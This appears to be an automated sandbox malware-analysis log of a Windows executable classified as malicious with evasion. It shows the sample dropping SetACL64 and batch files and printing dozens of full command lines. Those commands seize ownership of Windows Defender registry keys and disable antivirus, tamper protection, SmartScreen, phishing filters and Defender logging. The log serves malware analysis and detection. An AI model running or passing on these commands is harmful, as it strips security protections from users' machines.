Source: C:\Users\user\Desktop\Ms63nDrOBa.exeCode function: 0_2_0040350F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350F
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C174C28F4_2_00007FF7C174C28F
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C173E4B04_2_00007FF7C173E4B0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C17494BC4_2_00007FF7C17494BC
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C17534104_2_00007FF7C1753410
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C17013F04_2_00007FF7C17013F0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C172A3504_2_00007FF7C172A350
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C172BC404_2_00007FF7C172BC40
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C1736B2A4_2_00007FF7C1736B2A
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C17542184_2_00007FF7C1754218
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C173C2504_2_00007FF7C173C250
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C17163E04_2_00007FF7C17163E0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C175A31C4_2_00007FF7C175A31C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C17383604_2_00007FF7C1738360
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C174F3944_2_00007FF7C174F394
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C175669C4_2_00007FF7C175669C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C173A6304_2_00007FF7C173A630
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C170F6504_2_00007FF7C170F650
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C172E5304_2_00007FF7C172E530
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C17175804_2_00007FF7C1717580
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C17597184_2_00007FF7C1759718
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C175B74C4_2_00007FF7C175B74C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C175C76C4_2_00007FF7C175C76C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C1701A304_2_00007FF7C1701A30
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C174FB004_2_00007FF7C174FB00
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C1727B104_2_00007FF7C1727B10
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C173F9C04_2_00007FF7C173F9C0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C170E9D04_2_00007FF7C170E9D0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C174EA104_2_00007FF7C174EA10
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C1763C644_2_00007FF7C1763C64
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C170CB204_2_00007FF7C170CB20
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C174BFE84_2_00007FF7C174BFE8
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C175DFF04_2_00007FF7C175DFF0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C174EF304_2_00007FF7C174EF30
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C175EF6C4_2_00007FF7C175EF6C
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exe 5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe 4EFC87B7E585FCBE4EAED656D3DBADAEC88BECA7F92CA7F0089583B428A6B221
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\nsExec.dll 01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: String function: 00007FF7C1709D20 appears 94 times
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: String function: 00007FF7C17094C0 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: String function: 00007FF7C170AC70 appears 93 times
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: String function: 00007FF7C1709CB0 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: String function: 00007FF7C1713F80 appears 116 times
Source: Ms63nDrOBa.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: classification engineClassification label: mal96.phis.evad.winEXE@149/9@0/0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C171BF60 GetLastError,#13,SysStringByteLen,SysAllocStringByteLen,SysFreeString,LoadLibraryExW,LoadLibraryExW,FormatMessageW,LocalFree,FreeLibrary,_invalid_parameter_noinfo_noreturn,4_2_00007FF7C171BF60
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeCode function: 0_2_0040350F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350F
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C1723A5E AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError,4_2_00007FF7C1723A5E
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C1723D1B AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,4_2_00007FF7C1723D1B
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C1723FD8 AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,4_2_00007FF7C1723FD8
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C17142A0 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7C17142A0
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeCode function: 0_2_004049A4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049A4
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C1714810 FindResourceW,LoadResource,LockResource,FreeResource,_invalid_parameter_noinfo_noreturn,4_2_00007FF7C1714810
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5972:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3776:120:WilError_03
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeFile created: C:\Users\user\AppData\Local\Temp\nse5B60.tmpJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.bat
Source: Ms63nDrOBa.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Ms63nDrOBa.exeReversingLabs: Detection: 28%
Source: Ms63nDrOBa.exeVirustotal: Detection: 33%
Source: SetACL64.exeString found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL64.exeString found in binary or memory: -help
Source: SetACL64.exeString found in binary or memory: Type 'SetACL -help' for help.
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeFile read: C:\Users\user\Desktop\Ms63nDrOBa.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Ms63nDrOBa.exe "C:\Users\user\Desktop\Ms63nDrOBa.exe"
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn1.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.batJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn1.batJump to behavior
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
